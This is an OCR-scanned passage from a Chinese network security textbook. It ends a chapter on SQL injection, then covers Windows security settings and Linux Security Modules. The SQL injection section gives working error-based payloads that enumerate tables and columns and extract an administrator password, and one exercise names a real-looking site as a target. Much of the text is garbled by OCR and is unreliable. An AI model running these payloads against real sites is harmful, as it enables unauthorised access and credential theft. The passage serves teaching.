
[Microsoft] [ODBC SQL Server Driver] [SQL ServerlSyntax error converting the nvarchar value ‘class’ to a column of data 
type int. 


/reference cn/sortabc. asp: {747 


从 此 错误 提示 可 看 出 此 数据 库 中 还 含有 名 为 class HR. ARB HEU 1S 8 SQL i8 


可 ,可 依次 得 到 users, issn ERA. 


Xtype 


(4) 在 网 址 末尾 添加 : ‘and (select count * ) from REF. CS. dbo. sysobjects where 
'users' and uid >(str(id)))>0 and 一, 可 得 到 users RN id 号 ,其 














'U' and name 


第 10 章 SQL 注入 攻击 与 防 


反馈 信息 如 下 。 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 错误 '8004085T' 


[Microsoft][ODBC SQL Server Driver] [SQL Server]The conversion of the varchar value ' 
T89577851° overflowed an INT2 column. Use a larger integer column. 


/reference cn/sortabc. asp, 1747 


蔡 换 刚才 添加 语句 中 的 表 名 ,可 得 到 其 他 表 名 的 1d 号 。 
(5) 添加 : 'and (select top 1 name from REF CS. dbo. syscolumns where id = 
78957785107 0 and "一 ', 其 反馈 信息 如 下 。 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 和 异 误 800d40607” 


[Microsoft] [ODBC SQL Server Driver] (SQL Server]Syntax error converting the nvarchar value 'useráàuthority to a column of 
data type int. 


/reference cn/sortabc.asp. ÍT4T 


从 此 错误 提示 可 知 ,users 表 中 含有 user Authority F Ez. HE £z SJ: 'and (select top 1 
name from REF CS, dbo. syscolumns where id — 789577851 and name not in('userAuthority') ) > 
0 and''— ' 可 继续 反馈 信息 如 下 。 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers i= “80040e07’ 


[Microsoft] [ODBC SQL Server Driver] [SQL ServerlSyntax error converting the nvarchar value 'userDescribe' to a column of 
data type int. 


freference_cn/sortabe. asp, {T47 


FH i fei E nf Al. users X PIG A userDescribe 字段 ,以 此 方法 可 陆续 得 到 userid, 
userpassword, usertype, username 等 字段 。 

(6) 添加 'and(select castCCount(1) as varchar(8000)) %2Bchar(97) From users where 1— 
1)>0 and ''—'. Hs ife EUTF. 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e0T' 


[Microsoft] (ODBC SQL Server Driver] (SQL ServerlSyntax error converting the varchar value la to a column of data type 
int. 


/reference cn/sortabc.asp. {T47 
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由 此 信息 可 看 出 ,users 表 中 共 一 条 记录 。 

(7) 添加 : 'and (select Top 1 isNull(cast(username as varchar(8000)),char(32))% 
2Bchar(124) From (select Top 1 username From users where 1—1 Order by username) T 
Order by username desc)» 0 ''—'. HU ifs EH. 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 错误 *80040e07" 


[Microsoft] [ODBC SQL Server Driver] [SQL Server]Syntax error converting the varchar value 'admin|' to a column of data 
type int. 


/reference cn/sortabc. asp， 行 47 


由 此 信息 可 知 , 用 户 名 为 admin, 继 组 添加 'and (select Top 1 isNullCcastCuserpassword 
as varchar( 80000) . char (325) %2Bchar(124) From (select Top 1 userpassword From users 
where 1 — 1 Order by userpassword) T Order by userpassword desc)» 0 and "一 ', 其 反馈 全 


EP. 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 错误 80040e07’ 


[Microsoft] [ODBC SQL Server Driver] [SQL Server]Syntax error converting the varchar value 'adminl23|' to a column of data 
type int. 


/reference cn/sortabc. asp, ÍT4T 


由 此 信息 可 知 ,该 用 户 的 密码 为 admin123, 
10.5 ”本草 小 结 


SQL 注入 攻击 成 为 当前 网 站 攻击 的 主要 技术 之 一 , 它 针 对 攻击 对 象 是 数据 库 及 相应 应 
用 程序 ,攻击 层次 在 网 络 层 以 上 ,因此 传统 的 防火 墙 无 法 有 效 阻止 SQL 注入 攻击 。 随 看 网 
站 普及 ,以 及 应 用 程序 漏洞 难以 避免 ,SQL 注入 攻击 将 会 市 来 更 大 的 危害 。 本 革 首 先 给 出 
SQL 注入 攻击 相关 概念 ,分 析 了 SQL 注入 攻击 机 制 。 然 后 ,从 全 局 角度 阐述 了 SQL 注入 
攻击 过 程 , 同 时 ,给 出 一 个 实际 和 案例。 最 后 ,针对 SQL HEA BU By fo; ss DL) «Z5 h A T DU 1 
SQL 注入 攻击 的 技术 方法 。 


习题 10 


1. 简 述 SQL 注入 攻击 的 原理 及 注入 方法 的 类 型 。 

2. 简 述 SQL 注入 攻击 防范 技术 方法 。 

3. 一 般 存在 SQL 注入 漏洞 的 网 站 形式 是 什么 样子 ? 如 何 判 断 选 定 的 URL 地 址 是 否 
可 以 进行 SQL 注入 攻击 ? 
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4. 以 下 符号 在 SQL 注入 攻击 中 经 常用 到 的 是 ( D. 
A. $ B. E. | D. @ 
5. Æ SQLServer 2000 中 ,假定 一 个 学 生 选 修 评 管理 系统 中 有 两 个 表 , 包 括 student C£ 
生 ) 表 ,其 结构 为 sid( 学 号 ),sname( 姓 名 );studentcourse( 学 生 选 课 ) 表 ,其 结构 为 sid( 学 
号 ) ,cid( 课 程 编 号 ) ,score( 成 绩 )。 那 么 列 出 所 有 已 选课 学 生 的 学 号 、 姓 名 课程 编号 和 成 绩 
的 SQL AEC  ”) (选择 两 项 )， 
A. select sid. sname.cid.scord from student,studentcourse 
B. select sid. sname, cid. scord from student inner join studentcourse on student. 
sid — studentcourse. sid 
C. select sid. sname, cid. scord from student outer join studentcourse on student. 
sid — studentcourse. sid 
D. select sid. sname, cid. scord from student. studentcourse where student. sid = 
studentcourse. sid 
6. 以 http://www. chinamagic. com/NewProductShow. asp?ID= 317 为 例 , 进 行 SQL 
注入 攻击 ,并 取得 管理 员 的 账号 密码 (使 用 工具 ,如 “ 啊 D 注入”)。 
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CHAPTER Il 


Windows 系统 安全 ea 


11.1 Windows 安全 框架 


Windows 作为 当今 使 用 最 广泛 的 操作 系统 ,受到 了 广大 用 户 的 喜爱 。 如 
图 11-1 所 示 ,Windows 系统 采用 金字 培 形 的 安全 染 构 。 

对 于 Windows 系统 来 讲 ,系统 的 安全 性 
主要 体现 在 系统 的 组 件 的 功能 上 。 除 了 
Windows 系统 采用 的 安全 架构 外 , Windows 
还 提供 5 个 安全 组 件 , 信 以 保障 系统 的 安全 
性 。Windows 系统 组 件 体 现在 多 方面 ,如 
Windows 用 户 案 上 略 、 访 问 控制 的 判断 、 对 和 象 的 
重用 .强制 登录 .审核 .对 象 的 访问 控制 等 。 n Windows ASEE 

访问 控制 的 判断 允许 对 象 所 有 者 可 以 控 安全 架构 
制 谁 被 允许 访问 该 对 象 及 访问 的 方式 。 对 象 
重用 即 当 资源 被 某 应 用 程序 访问 时 ,Windows 禁止 其 他 系统 应 用 访问 该 资 
源 。 强 制 登 录 即 要 求 有 所 有 的 用 户 必 须 登 录 , 那 么 通过 认证 后 才 可 以 访问 系统 
帝 源 。 审 核 即 可 以 看 到 本 地 计算 机 登录 的 审核 列表 。 当 登录 该 计算 机 失败 ， 
管理 员 就 很 快 可 以 确定 是 否 存在 恶意 人 侵 。 对 象 的 访问 控制 即 访问 和 资源 , 必 
须 是 该 贤 源 允许 被 访问 。 

Windows 系统 提供 的 系统 安全 涉及 应 用 程序 安全 、 注 册 表 安全 、 系 统 服 
务 安全 审核 案 略 、 文 件 权 限 安 全 、 用 户 账 户 安 全 、 网 络 服务 安全 等 。 

应 用 程序 安全 是 指 在 操作 系统 上 安 六 正常 的 应 用 程序 ,禁止 非法 的 程序 
运行 ,登录 到 Internet。 系 统 服务 安全 是 指 用 户 在 安 闻 操 作 系 统 时 ,同时 会 安 
交大 量 服务 。 运 行 的 服务 越 多 ,造成 的 安全 油 洞 越 多 。 对 于 一 般 用 户 而 言 ， 
根据 服务 的 摘 述 .业务 的 需求 确定 是 否 使 用 某 个 服务 ,关闭 无 用 的 程序 。 注 
册 表 安全 是 指 由 于 Windows 注册 表 包 含 了 系统 运行 时 需要 的 信息 ,注册 表 
文件 作为 Windows 系统 运行 时 的 配置 文件 在 安全 性 方面 起 着 决定 性 的 作 
用 。 审 核 策 略 是 对 系统 运行 情况 、 用 户 访 问 操 作 进 行 检查 的 重要 安全 手段 。 
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11.2 用 户 账 尸 安全 


用 户 账户 安全 包括 对 用 户 账 户 管 理 . 用 户 组 管理 .用户 权限 指 铂 和 用 户 环境 安全 。 用 户 
账户 管理 体现 在 对 单个 用 户 账户 的 管理 ; 用 户 组 管理 包括 向 用 户 组 添加 用 户 、 修 改组 作用 
域 等 ,用 户 权 限 指派 是 指 为 用 户 设 置 权 利 等 ; 用 户 环境 安全 主要 包括 对 用 户 配 置 文件 的 管 
理 与 保护 。 

用 户 环境 安全 是 指 用 户 果 面 、 网 络 连接 等 配置 ,保障 用 户 可 以 快速 投入 工作 。 在 默认 情 
况 下 ,多 数 用 户 信息 都 被 保存 在 用 户 名 的 目录 下 ,这 导致 许多 敏感 信息 容易 被 罚 取 。 通 过 对 
重要 的 用 户 配 置信 息 重 定 问 ,可 以 避免 上 述 情 况 发 生 。 文 件 重 定 问 的 内 容 包 括 定 位 到 用 户 
配置 文件 ,程序 安装 目录 ,IE 临时 文件 夹 ,虚拟 内 存 等 。 

重 定 向 用 户 配置 文件 是 指 将 所 有 上 账户 的 配置 文件 都 保存 到 其 他 非 系 统 分 区 的 安全 目录 
下 。 在 贰 源 管 理 天 中 ,打开 系统 分 区 用 户 中 某 位 用 户 的 文件 夹 并 右 击 ,在 弹出 的 快捷 沫 单 中 
选择 “属性 ”命令 ,切换 到 "位 置 ? 选 项 卡 , 单 击 ”移动 ”按钮 并 选择 目标 , 即 可 完成 用 户 配置 文 
件 的 重 定 回 。 

用 户 上 默认 应 用 程序 大 多 都 安装 在 “%Systemroot%\Program Files” 目 录 下 , 随 着 安装 文 
件 的 增多 ,通过 修改 注册 表 文 件 可 将 默认 安 疤 目录 重 定 癌 到 其 他 分 区 或 磁盘 。 打 开 注 册 表 
编辑 um. 展开 HKEY LOCAL MACHINE\ SOFTWARE \ Mircrosoft \ Windows \ 
CurrentVersion 7; X. 双击 ProgramFilesDir f 3 iE ER iA Bg H e E «E m] 8l H ck X B EH 
KPF. 

IE iX] 93, Ar TE 1X1] vu, A Va S SERE I 8 He A tr Internet 选项 中 浏览 历史 记 
录 中 的 "设置 "按钮 ,修改 系统 默认 的 临时 文件 夹 位 置 ,可 完成 重 定 回 到 其 他 目录 的 目的 。 


11.3 文件 系统 安全 


1. 文件 权限 管理 服务 

为 了 保障 Windows 文件 系统 安全 ,Windows 使 用 NTFS 文件 系统 。 本 书 的 第 15 章 对 
NTFS 系统 进行 了 详细 的 讲解 。 除 了 使 用 设计 成 熟 的 文件 系统 外 ,内 部 用 户 也 是 造成 文件 
不 安全 的 主要 因素 之 一 , 设 定 合理 的 文件 访问 权限 可 以 防止 文件 系统 来 自 内 部 用 户 的 攻击 。 
在 Windows Server 2008 系统 中 ,权限 管理 服务 AD RMS 通过 数字 证 书 和 用 户 身 份 验 证 对 
Office 文档 的 访问 权限 加 以 限制 。 在 Windows 系统 中 AD RMS 前 的 RMS 是 一 个 独立 的 
服务 插件 。 

RMS(Rights Management Services) 是 指 文 持 信 息 权 限 管 理 的 服务 需 与 客户 端的 技术 。 
组 织 中 的 RMS 认证 和 授权 服务 天 与 微软 文 持 的 RMS 服务 一 起 证 明 RMS 系统 中 的 可 信和 实 
体 。 将 不 同 的 RMS 客户 端 与 服务 端 技 术 结 合 在 一 起 可 以 提供 以 下 功能 。 

(1) 分 发 和 授权 受 RMS 保护 的 内 容 。 

(2) 创建 受 RMS 保护 的 内 容 。 

(3) 获取 许可 证 解密 受 RMS 保护 的 信息 。 
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2. 共享 资源 安全 

在 同一 共享 网 络 中 ,任何 进入 网 络 的 用 户 都 可 以 查看 共享 的 资源 。 为 了 防止 资源 不 被 
无 关 人 员 查 看 ， 最 常用 的 方法 就 是 限制 用 户 对 文件 的 访问 权限 。 由 于 共 带 资源 的 安全 性 要 
求 高 于 本 地 文件 安全 性 ,对 于 共享 资源 可 以 同时 采取 多 种 安全 限制 指 施 。 

将 文件 夹 设 定 为 共享 资源 时 ,除了 需要 对 文件 和 文件 夹 指 定 为 NTFS 权限 外 ,还 需要 
对 共享 文件 设置 共享 文件 夹 属性 。 设 置 共 享 文件 夹 属性 具有 以 下 特点 

(1) 共享 文件 夹 权 限 只 适用 于 文件 夹 ,不 适用 于 单独 文件 。 

(2) 共享 文件 夹 权 限 不 对 直接 登录 到 计算 机 的 用 户 起 作用 ,只 对 通过 网 络 连接 该 文件 
夹 的 用 户 起 作用 。 

(3) 默认 的 共享 文件 夹 权 限 是 读 取 ,指定 给 everyone 组 。 

在 共享 网 络 中 找到 一 种 灵活 的 文件 访问 方法 ,结合 共享 文件 权限 和 NTFS 权限 即 可 。 
共享 文件 夹 为 资源 提供 有 限 的 安全 性 , NTFS 为 共享 文件 夹 提 供 最 大 的 灵活 性 。 在 访问 本 
地 资源 或 通过 网 络 访问 资源 时 ,NTFS 权限 起 着 重要 的 作用 。 

当 NTFS 权限 和 共享 文件 夹 权 限 组 合 使 用 时 ,采用 组 合 限定 范围 最 军 的 作为 文件 访问 
的 权限 。 如 图 11-2 所 示 ,用 户 对 共享 文件 夹 A 具有 完全 控制 权限 ,但 对 其 中 的 Filel 只 有 
读 取 权限 。 那 么 需要 设置 用 户 拥有 对 共享 文件 夹 A 完全 控制 的 共享 权限 ,在 设置 共享 文件 
夹 A 的 NTEFS 权 限时 ,也 设置 用 户 对 共享 文件 夹 A 的 完全 控制 权限 ,同时 将 Filel 设 定 为 
读 取 权限 。 





图 11-2 文件 共享 权限 说 明 


11.4 网 络 服务 安全 


1. WWW 服务 安全 

WWW 服务 是 常用 网 络 服务 之 一 ,在 装载 Windows 系统 的 服务 器 上 可 以 直接 使 用 IIS 
搭建 具有 特定 功能 的 Web 网 站 。 基 于 Web 管理 界面 的 网 络 服务 都 需要 用 到 WWW 服务 。 
因此 ,提供 安全 可 靠 的 WWW 服务 对 本 地 计算 机 乃至 整个 网 络 都 起 到 重要 的 作用 。 

保障 WWW 服务 安全 ,需要 实现 对 访问 用 户 进行 控制 ,使 用 适当 的 身份 验证 方式 可 以 
实现 此 目标 。 在 Windows Server 服务 六 上 可 以 通过 选择 "Internet fa EJ E PERS BP. 
选中 目标 服务 硕 , 打 开 黑 认 Web 站 点 中 的 身份 验证 窗口 执行 此 操作 。 管 理 员 根 据 实 际 情 
况 ,为 特殊 文件 设 定 访问 策略 也 是 保护 Windows 安全 的 一 种 方法 ,可 以 授 了 了 IIS 中 的 Web 
服务 需 、 网 站 .应 用 程序 .目录 或 文件 级 别 的 处 理 程 序 功能 权限 类 型 。 
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IIS 服务 可 能 会 提供 IP 数据 包 的 转发 功能 ,充当 路 由 带 角 色 的 IIS 服务 器 可 以 把 从 
Internet 接口 收 到 的 IP 数据 包 转 发 到 内 部 网 中 。 攻 击 者 可 以 利用 提供 此 项 服务 的 
Windows Server 作为 跳板 ,把 IP 数据 包 发 送 到 内 部 网 中 。 在 实际 场景 中 ,通过 禁用 P RH 
发 的 功能 可 以 提高 IIS 服务 的 安全 性 。 通 过 编辑 注册 表 可 以 设置 TCP/IP 需要 转发 的 内 
容 , 由 于 修改 注册 表 有 一 定 的 风险 ,实现 备份 注册 表 后 再 进行 操作 。 注 册 表 的 修改 内 容 是 注 
册 表 项 HKEY LOCAL MACHINENSYSTEMW CurrentControlSet \ Services \ Tcpop \ 
ParametersNV.1] JF IPEnableRouter 项 ,将 数值 修改 为 0 即 可 。 

SSL 功能 可 以 对 传输 的 信息 进行 加 密 ,实现 Web 客户 端 和 Web 服务 端的 安全 传输 Di 
gt 对 安全 要 求 较 高 的 Web 网 站 需要 采用 SSL Dy XX In 25 fz fà 1H 

。 使 用 Windows Server 可 以 配置 SSL 安全 功能 。 用 户 仪 需要 通过 在 服务 器 创建 SSL 加 
dE ALR 用 SSL 设置 的 方式 就 可 以 开局 SSL 服务 。 

2. FTP 服务 安全 

FTP 服务 为 用 户 提 供 上 传 下 载 功 能 ,客户 端 可 以 利用 此 功能 加 服务 关上 传 下 载 内 容 。 
基于 IS 的 FTP 服务 器 运行 稳定 。FTP 站 点 中 常常 存储 许多 重要 的 文件 或 应 用 程序 ,对 于 
FTP 访问 应 当 设 定 相 关 的 安全 措施 ,如 进行 号 份 验 证 ,限制 允许 访问 该 FTP 服务 的 IP 地 
HE ,进而 保障 FTP 的 站 点 安全 。 

通过 禁止 匿名 访问 ,要 求 用 户 需 经 过 号 份 认证 后 才 可 以 进行 查看 ,下 载 FTP 上 的 内 容 。 
除了 禁止 匿名 连接 外 ,还 可 以 在 本 地 计算 机 创建 专用 FTP 连接 匿名 账户 ,对 FTP 主 目录 下 
或 单个 文件 夹 的 权限 进行 限制 。 对 于 某 些 恶 意 用 户 , 可 以 通过 设 定 IP 黑 名 单 的 方式 禁止 其 
访问 FTP 服务 。 

通过 限定 文件 的 访问 权限 也 可 以 起 到 保护 FTP 站 点 内 容 保 密 性 的 作用 。 可 以 将 FTP 
站 点 修改 为 授权 用 户 提供 下 载 服 务 的 功能 ,将 FTP 站 点 赋予 读 取 和 写 入 的 权利 ,可 以 实现 
AP EAR. 

3. 终端 服务 安全 

终端 服务 (TS) 网 关 可 以 使 用 户 通过 Internet 连接 远程 位 置 ,运行 远程 桌面 连接 客户 端 


设备 ,对 远程 资源 进行 操作 。TS 网 关 使 用 HTTPS 上 的 远程 果 面 协议 在 Internet 上 的 远程 


用 户 与 目标 通信 主机 之 间 建 立 安全 的 加 密 连 接 。 

TS 网 关 的 优点 如 下 。 

CD 通过 TS 网 关 , 远 程 用 户 可 以 使 用 加 密 连 接 , 通 过 Internet 连接 到 内 部 网 络 资 源 , 无 
须 配 置 虚 拟 专 用 网 络 (VPN) 连 接 。TS 网 关 提 供 全 面 的 安全 配置 模型 ,可 以 控制 对 特定 内 
部 网 络 资源 的 访问 。TS 网 关 提 供 点 对 点 的 RDP 连接 ,而 不 是 允许 远程 用 户 访 问 所 有 内 部 
LESE M 

(2) 通过 TS WX. Ke C Fe Hl P n] Xe Be SIE e FH MP 28 np Dj 2098 J TED 9X s P9] 2K Hh 
址 转换 程序 (NAT) 托 管 的 内 部 网 络 资 源 。 

(3) 通过 TS 网关, 管理 融 管理 单元 控制 台 可 以 配置 授权 策略 ,以 定义 撑 程 用 户 要 连接 
到 内 部 网 络 资 源 必 须 满 足 的 条 件 。 

搭建 Windows Server 操作 系统 的 服务 器 下 使 用 TS 网 关 需 要 满足 以 下 条 件 。 

C1) 配置 为 TS 网 关 的 用 户 ,再 要 是 服务 带 计 算 机 上 Admininistrators 组 的 成 员 。 


第 11 # Windows Z Zt Zee 


(2) 必须 为 TS IRS 383A UE AEBPCEE SSL 证 书 。 在 TS XI HE. RPC/ 
HTTP 负载 平衡 服务 和 Internet 信息 服务 (IIS) 使 用 传输 层 安 全 (TLS)1. 0 对 通过 Internet 
在 客户 端 与 TS 网 关 服 务 吾 之 间 进 行 的 通信 加 密 。 帮 要 正 第 使 用 TLS, 必 须 在 TS 网 关 服 
ae KA SSL 证 书 。 

(3) 如 果 配 置 的 TS WCE AR ERA in FL EY HE Active Directory 安全 
组 的 成 员 ,才能 连接 到 TS 网 关 服 务 需 ,或 者 如 果 要 部 署 负载 平衡 的 TS 网 关 服 务 需 群集 , 则 
TS n JE E 48421 Active Directory 域 的 成 员 。 

在 使 用 Windows 系统 时 ,在 TS 网 关 管 理 天 窗口 中 可 以 查看 当前 正在 进行 的 连接 。 在 
TS 网 关 管 理 硕 中 ,可 以 监视 的 内 容 包 括 连接 的 ID ,用户 ID .用 户 名 .连接 时 段 、 空闲 时 间 、 
目标 计算 机 、 客 户 IP 地 址 ,目标 端口 信息 等 。 


11.5 ;kzz 


AS TEST ZA Windows 系统 设计 时 考虑 的 安全 问题 ,还 介绍 了 Windows 系统 的 用 户 账 
户 安 全 文件 系统 安全 .网 络 服务 安全 等 。Windows 系统 使 用 用 户 群 广泛 ,基于 Windows 
系统 的 安全 软件 多 具有 民 好 的 用 户 界 面 , 安 波 后 即 可 进行 操作 ,本 草 中 未 对 此 类 软件 进行 介 
绍 。 关 于 Windows 系统 底层 安全 机 制 的 变化 可 查看 本 书 第 17 3E. 


习题 11 


1 为 了 保障 用 户 环 境 安 全 ,Windows 中 有 多 种 重 定 问 机 制 ,Windows 可 以 进行 重 定 问 
的 内 容 包 括 哪 些 ? 

2. 在 网 络 共 圣贤 源 场景 下 , 某 文 件 夹 同时 受 共 圣 文 件 权限 和 NTFS 权限 的 限制 ,此 时 
应 该 依照 哪 种 准则 来 表示 该 文件 的 权限 。 

3. 在 网 络 共 诗 资源 场景 下 , 当 某 用 户 通 过 账户 登录 到 位 于 网 络 共 至 资源 段 的 计算 机 是 
否 有 权利 查看 共享 资源 ? 

4. HPEH TS 网 关 需 要 满足 哪些 要 求 ? 
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第 12 章 Linux 系统 安全 


12.1 Linux 安全 框架 


Linux 安全 包括 系统 安全 ,数据 安全 ,通信 安全 ,安全 应 用 程序 4 个 部 分 。 
系统 安全 即 为 程序 安放 .有 尼 动 .执行 提供 一 个 可 行 的 环境 ,提供 操作 系统 司 动 
时 可 验证 的 安全 机 制 。 效 据 安 全 包括 软件 和 硬件 安全 模块 。 数 据 安 全 提供 
了 存储 和 管理 敏感 数据 和 设备 的 安全 框架 。 通 信安 全 通过 加 密 用 户 和 服务 
全 间 的 通信 保障 通信 的 可 信和 度 , 通 信安 全 依赖 于 加 密 算 法 , 公 角 基 础 设施 和 
客户 /服务 更 互相 签名 保障 通信 和 安全。 安全 应 用 程序 是 指 在 Linux 操作 系统 
中 含有 如 防火 墙 .杀毒 软件 等 安全 相关 的 应 用 程序 。 

Linux 安全 框架 由 内 核 安 全 模块 .安全 应 用 程序 .硬件 安全 模块 组 成 。 
Linux 安全 框架 提供 了 程序 安全 运行 数据 安全 的 环境 。Linux WEE ER 
如 图 12-1 Bra. 

Linux 安 全 框架 





图 12-1 Linux 安全 框架 


第 12 Linx 系统 安 


Linux 的 安全 启动 在 启动 时 用 来 检查 软件 完整 性 机 制 ,这 一 功能 依赖 预先 设 定 的 便 件 
装置 完成 。 通 过 签名 校 验算 法 确定 软件 是 否 遭 受到 恶意 算 改 。 将 软件 的 二 进 制 映像 哈 硕 值 
和 存在 OTP 闪存 中 的 哈 希 值 进 行 对 比 。Linux 硬件 平台 通过 抽象 层 为 上 层 提 供 相 关 的 服 
务 。 安 全 模块 驱动 程序 用 来 配置 便 件 安全 模块 。Linux 内 核 层 需要 进行 资源 访问 控制 和 网 
络 安全 的 保障 。Linux 给 应 用 程序 提供 相应 的 安全 服务 ,加密 算 法 库 API 接口 ,算法 库 中 包 
含 各 类 加 密 算 法 。TPAPI 集成 了 完整 性 验证 表 模 块 ,提供 了 系统 中 数据 完整 性 的 保护 ,会 
在 系统 中 对 特殊 文件 进行 完整 性 检查 。VPN/SSL 服务 ,保障 数据 的 安全 传输 。 

Linux 系统 通过 Linux 安全 模型 (LSM) 为 Linux 系统 提供 安全 增强 的 可 执行 机 制 , 使 
得 Linux 可 加 载 不 同 的 安全 增强 模块 ,扩展 性 更 强 。 

Linux 常用 技术 包括 PAM 用 户 认 证 机 制 . 入 侵 检 测 系统 、 加 密 文 件 系统 ,安全 审计 、 
ACL 自主 访问 控制 ,强制 访问 控制 ,防火 墙 \ 杀 毒 软件 ,网 络 安全 和 DRM 等 。 用 户 PAM 认 
证 机 制 为 开发 更 有 效 的 认证 方法 提供 了 便利 。Linux 有 多 种 加 密 文 件 系统 ,如 CFS、TCFS、 
eCryptfs +. 

Linux 基于 ACL 的 自主 访问 控制 实现 系统 中 任 一 用 户 或 用 户 组 对 各 类 系统 资源 的 访 
问 。 强 制 访问 控制 保证 了 通过 标记 系统 中 的 主客 体 , 强 制 性 的 限制 信息 的 共享 ,强制 限制 每 
类 用 户 对 系统 资源 的 访问 。Linux 的 防火 墙 系 统 提 供 访 问 控 制 . 审 计 、 入 侵 检 测 及 号 份 验证 
等 多 项 功能 。Linux 提供 了 许多 安全 的 互联 网 通信 协议 。DRM 是 指 对 数字 媒体 内 容 进 行 
内 容 保 护 和 版 权 管理 的 功能 。 


12.2 LSM 


12.2.1 LSM 简介 


由 于 Linux 系统 出 色 的 性 能 和 稳定 性 ,以 及 Linux 开源 的 特性 ,使 Linux 系统 有 良好 的 
灵活 性 和 可 扩展 性 ,对 Linux 系统 的 应 用 扩展 到 计算 机 工业 界 。 但 Linux 内 核 只 提供 了 经 
典 的 UNIX 目 主 访问 控制 。 如 此 单一 的 安全 特性 在 一 定 程度 上 限制 了 Linux 系统 的 发 展 。 
在 2001 年 Linux 内 核 峰 会 上 ,美国 国家 安全 局 公布 了 他 们 关于 安全 增强 Linux 研究 的 工作 
后 ,Linux 创始 人 Linus Torvalds 认为 Linux 内 核 中 需要 一 个 通用 的 安全 访问 控制 框架 , 通 
过 可 加 载 内 核 模块 的 方式 , 文 持 各 种 不 同 的 安全 访问 控制 体系 。 

LSM 是 Linux 内 核 的 一 个 轻 量 级 通用 访问 框架 。 它 使 各 种 不 同安 全 访问 控制 模型 能 
WV Linux 可 加 载 内 核 模块 的 形式 实现 。 用 户 可 根据 具体 需求 将 适合 的 安全 模块 加 载 到 
Linux 内 核 中 。SELinux、 域 和 类 型 增强 ,以 及 Linux 人 侵 检 测 系 统 等 都 是 基于 LSM 框架 。 
LSM 一 方面 弥补 了 Linux 欠缺 的 安全 机 制 , 男 一 方面 为 各 种 类 型 的 安全 增强 系统 提供 了 实 
现 的 机 制 。 


12.2.2 LSM 设计 思想 


LSM 设计 思想 主要 遵循 两 个 原则 ,让 需要 使 用 此 模块 的 用 户 可 以 得 到 高 效 的 功能 ,让 
不 需要 使 用 此 模 顽 的 用 户 不 会 因此 受到 影响 。 队 此 之 外 ,对 基于 LSM 的 安全 增强 系统 而 
言 ;要 在 允许 他 们 可 加 载 内 核 的 形式 下 实现 其 功能 ,同时 不 能 引起 新 的 系统 安全 性 问题 ,也 
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曾 络 攻防 原理 及 应 用 
不 应 增加 系统 额外 的 开销 。 

以 Linus Torvalds 为 代表 的 内 核 开 发 人 员 对 LSM 提出 了 三 点 要 求 。 

(D 真正 的 通用 , 妆 使 用 一 个 不 同 的 安全 模型 的 时 候 , 只 需要 加 载 一 个 不 同 的 内 核 

(2) 概念 上 简单 ,对 Linux 内 核 影 响 最 小 ,高 效 。 

(3) 能 够 支持 现存 的 POSIX. le capabilities 逻辑 ,作为 一 个 可 选 的 安全 模块 。 

LSM 在 Linux 系统 中 是 以 在 内 核 中 打 补 丁 的 方式 实现 ,LSM 本 刁 不 提供 安全 策略 及 
安全 功能 ,仅仅 提供 一 个 通用 安全 体系 结构 ,具体 的 安全 策略 由 其 加 载 的 安全 模块 提供 。 具 
体 而 言 ,LSM 在 5 个 方面 对 Linux 内 核 进 行 了 修改 : 在 Linux 内 核 中 某 些 数据 结构 中 引入 
安全 域 ; 在 内 核 源码 关键 点 加 入 了 安全 钩子 图 数 调用 ; 在 内 核 源 码 中 加 入 安全 系统 调用 ; 
提供 安全 内 核 模 块 加 载 注 销 图 数 ; 用 capabilities 逻辑 实现 一 可 选 的 安全 模块 。 

在 内 核 数 据 结构 中 引入 安全 域 ,安全 域 是 一 个 void * 类 型 的 指针 ,LSM 通过 安全 域 将 
安全 信息 及 内 核 内 部 对 象 关联 起 来 。 以 下 列 出 了 引入 安全 域 的 被 修改 过 的 内 核 数 据 结构 : 
task struct 结构 表示 任务 (进程 ); linux. binprm 结构 表示 程序 ; super. block 结构 表示 文件 
系统 ; inode 结构 表示 文件 ,管道 或 Socket 套 接 字 ; file 结构 表示 已 打开 的 文件 ; sk. buff X 


示 网 络 组 冲 区 ; net device 表示 网 络 设备 ; kern_ipc_perm 结构 表示 Semaphore fri — . H F 


VJ ££ Br rH BY; msg msg Xon AP JH A 

LSM tet f MRR PREAH PR DC I] HE: 一 类 负责 管理 内 核对 象 的 安全 域 ; 73 — 25 
Fio fi RRX E P A OT AR BS Un] 

LSM 提供 了 一 个 通用 的 安全 系统 调用 ,这 样 安全 模块 就 可 以 根据 具体 的 安全 特性 重新 
编写 新 的 系统 调用 。 这 个 系统 调用 为 security O ,其 参数 为 (unsigned int id, unsigned int 
call. unsigned long * args), He id 代表 模块 摘 述 符 ,call 代表 调用 描述 和 从 ,args 代表 参数 
列表 。 

LSM 提供 了 图 数 允 许 内 核 模 块 注 册 为 安全 模块 或 注销 。LSM 被 初始 化 一 系列 虚拟 钧 
于 了 负数 , 当 加 载 某 个 安全 模块 时 ,需要 通过 register security O 图 数 回 LSM 框架 注册 此 安全 


模块 。 当 茶 个 安全 模块 被 加 载 后 , 台 成 为 系统 安全 策略 的 决 宁 中 心 。 此 时 ,新 的 安全 模块 在 


注册 时 调用 register. security O PR MICE MINN RR. ARAMA RED Ay ae AB 
unregister security O PK Z& [n] TEE 28 T FAA. WE A NEBR . 

Linux 内 核 现在 对 capabilities 的 一 个 子 集 提 供 文 持 ,LSM 的 需求 就 是 将 此 功能 移植 为 
一 个 可 选 的 安全 模块 。LSM 保留 了 在 内 核 中 用 来 执行 capability 检查 的 现存 capable() 接 
HO ,将 capableO 因数 催化 为 LSM 钧 子 图 数 。 除 此 之 外 ,LSM 保留 了 task. struck 结构 中 的 
进程 capability 集 。LSM 中 开发 并 移植 了 相当 部 分 的 capabilities 逻辑 到 capabilities 模块 
中 ,内 核 中 保留 了 capabilities 的 功能 。 这 减少 了 对 Linux 内 核 的 修改 且 保 留 了 对 原 有 
capabilities 的 应 用 程序 文 持 。 


12.2.3 LSM 接口 说 明 


LSM 提供 了 接口 ,将 现存 的 安全 增强 系统 移植 到 此 框架 上 ,使 新 增 的 安全 模块 以 加 载 
